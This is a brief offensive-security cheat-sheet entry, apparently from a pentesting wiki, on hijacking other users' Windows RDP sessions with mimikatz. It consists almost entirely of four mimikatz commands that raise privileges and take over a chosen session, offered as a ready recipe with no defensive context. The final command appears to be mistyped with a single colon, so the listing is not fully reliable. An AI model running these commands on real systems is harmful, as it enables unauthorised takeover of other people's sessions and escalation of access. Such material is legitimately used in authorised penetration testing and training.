RDP Hijacking

If we have a RDP Session we can hijack others sessions with mimikatz:

privilege::debug

token::elevate

ts::sessions

ts:remote /id:{id}

Last updated